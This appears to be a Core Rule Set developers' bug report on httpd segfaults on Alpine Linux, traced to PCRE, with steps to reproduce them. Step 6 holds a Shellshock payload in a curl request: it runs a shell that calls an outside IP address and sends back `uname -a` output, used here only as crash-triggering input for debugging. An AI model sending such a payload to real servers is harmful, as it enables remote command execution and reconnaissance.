Investigation report on segfaults with httpd on Alpine Linux

[theseion]

@airween and I spent some time analysing reproducible segfaults on Alpine Linux. We were able to track the issue to PCRE but did not investigate further. The segfaults are triggered by some specific regular expressions only, such as the one for CRS rule 934140, in combination with the input length.

Steps to reproduce the issue:

1. download the tar archive and extract the two scripts
2. set up a fresh installation of Alpine Linux (do not use LXC, the segfaults did not manifest when we tried that)
3. copy the setup.sh and run.sh scripts to the newly installed system, e.g., to /tmp
4. run setup.sh to compile httpd, ModSecurity and set up CRS
5. run run.sh to configure CRS and httpd and start httpd
6. run the following curl command against the started httpd:

curl -v localhost:8080/post --data 'arg=()%20{%20:;};%20/bin/sh%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\\"+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something'

You'll see an "empty reply" in curl and a segfault in the httpd error log.

@airween and I have decided not to investigate further and to not fix the issue at this time. We are not aware of anyone having encountered this before. We may reconsider if others step forward with the same problem. In addition, ModSecurity 2 is switching to PCRE2 by default and the segfaults do not occur with PCRE2.

alpin-segfault-setup.tar.gz